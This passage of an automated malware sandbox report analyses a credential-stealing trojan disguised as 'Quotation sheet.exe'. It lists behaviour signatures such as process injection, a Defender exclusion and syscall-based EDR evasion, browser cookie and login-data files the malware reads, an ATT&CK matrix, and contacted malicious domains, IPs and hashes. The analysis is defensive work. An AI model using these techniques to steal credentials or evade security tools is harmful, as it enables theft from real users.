                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara match; File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.2440846856.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.3973205147.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000B.00000002.3973090704.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.3973266974.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.3973027179.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.2448995977.0000000006B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0.2.Quotation sheet.exe.5c50000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.Quotation sheet.exe.5c50000.4.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.Quotation sheet.exe.4379970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000000.00000002.2354177736.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.2346401680.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\pcaui.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Source: Yara match; File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.2440846856.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.3973205147.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000B.00000002.3973090704.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.3973266974.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.3973027179.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.2448995977.0000000006B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0.2.Quotation sheet.exe.5c50000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.Quotation sheet.exe.5c50000.4.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.Quotation sheet.exe.4379970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000000.00000002.2354177736.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.2346401680.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading
                      612
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      121
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism
                      11
                      Disable or Modify Tools
                      LSASS Memory2
                      Process Discovery
                      Remote Desktop Protocol1
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading
                      41
                      Virtualization/Sandbox Evasion
                      Security Account Manager41
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin Shares1
                      Data from Local System
                      4
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture4
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets2
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism
                      Cached Domain Credentials113
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Behavior Graph ID: 1562984, Sample: Quotation sheet.exe, Startdate: 26/11/2024, Architecture: WINDOWS, Score: 100

                      • Overall
                        DNS/IP: www.rtpterbaruwaktu3.xyz (Performs DNS queries to domains with low reputation); rtpterbaruwaktu3.xyz; 10 other IPs or domains
                        Signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Yara detected PureLog Stealer; 9 other signatures
                      • Quotation sheet.exe (started)
                        Dropped file: C:\Users\user\...\Quotation sheet.exe.log, ASCII
                        Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                        Started: vbc.exe; powershell.exe; vbc.exe
                      • vbc.exe (started by Quotation sheet.exe)
                        Signatures: Maps a DLL or memory area into another process
                        Injected: UsMxwwTDRUHSSD.exe
                      • powershell.exe (started by Quotation sheet.exe)
                        Signatures: Loading BitLocker PowerShell Module
                        Started: conhost.exe
                      • UsMxwwTDRUHSSD.exe (injected by vbc.exe)
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                        Started: pcaui.exe
                      • pcaui.exe (started by UsMxwwTDRUHSSD.exe)
                        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                        Injected: UsMxwwTDRUHSSD.exe
                        Started: firefox.exe
                      • UsMxwwTDRUHSSD.exe (injected by pcaui.exe)
                        DNS/IP: rtpterbaruwaktu3.xyz 103.21.221.87, 49805, 80 LINKNET-ID-APLinknetASNID unknown; www.ytsd88.top 47.76.213.197, 50000, 50006, 50008 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States; 7 other IPs or domains
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)

                      Source | Detection | Scanner | Label | Link
                      Quotation sheet.exe | 42% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal |
                      Quotation sheet.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                                                                            high
                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://delivery.consentmanager.netpcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.mgm.gov.tr/?il=manisaQuotation sheet.exefalse
                                                                                      high
                                                                                      http://i3.cdn-image.com/__media__/pics/29590/bg1.png)pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHKOQuotation sheet.exe, 00000000.00000002.2338419650.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.matteicapital.online/Capital_Investment_Advisors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSikOpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.ecosia.org/newtab/pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.matteicapital.online/Working_Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1Spcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=nspcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://www.trtworld.com/#frmActiveBrowsersQuotation sheet.exefalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://ac.ecosia.org/autocomplete?q=pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.matteicapital.online/Raising_Capital_for_Business.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSikOFpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://i3.cdn-image.com/__media__/js/min.js?v2.3pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.Matteicapital.onlinepcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.tcmb.gov.tr/wps/wcm/connect/tr/tcmbQuotation sheet.exefalse
                                                                                                                    high
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.onlinepcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
146.88.233.115 | smartcongress.net | France | 53589 | PLANETHOSTER-8CA | false
103.21.221.87 | rtpterbaruwaktu3.xyz | unknown | 9905 | LINKNET-ID-APLinknetASNID | true
8.210.114.150 | www.llljjjiii.shop | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
47.76.213.197 | www.ytsd88.top | United States | 9500 | VODAFONE-TRANSIT-ASVodafoneNZLtdNZ | false
199.59.243.227 | www.acond-22-mvr.click | United States | 395082 | BODIS-NJUS | false
208.91.197.27 | www.matteicapital.online | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | false
38.47.232.124 | 70kdd.top | United States | 174 | COGENT-174US | false
194.85.61.76 | www.mrpokrovskii.pro | Russian Federation | 48287 | RU-CENTERRU | false
172.67.209.48 | www.ampsamkok88.shop | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562984
Start date and time: 2024-11-26 11:15:39 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Quotation sheet.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@12/7@12/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 209
• Number of non-executed functions: 283
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Quotation sheet.exe
No simulations
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      No context
                                                                                                                      No context
                                                                                                                      Process:C:\Users\user\Desktop\Quotation sheet.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1216
                                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                                                      MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                                                      SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                                                      SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                                                      SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                                                      Malicious:true
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
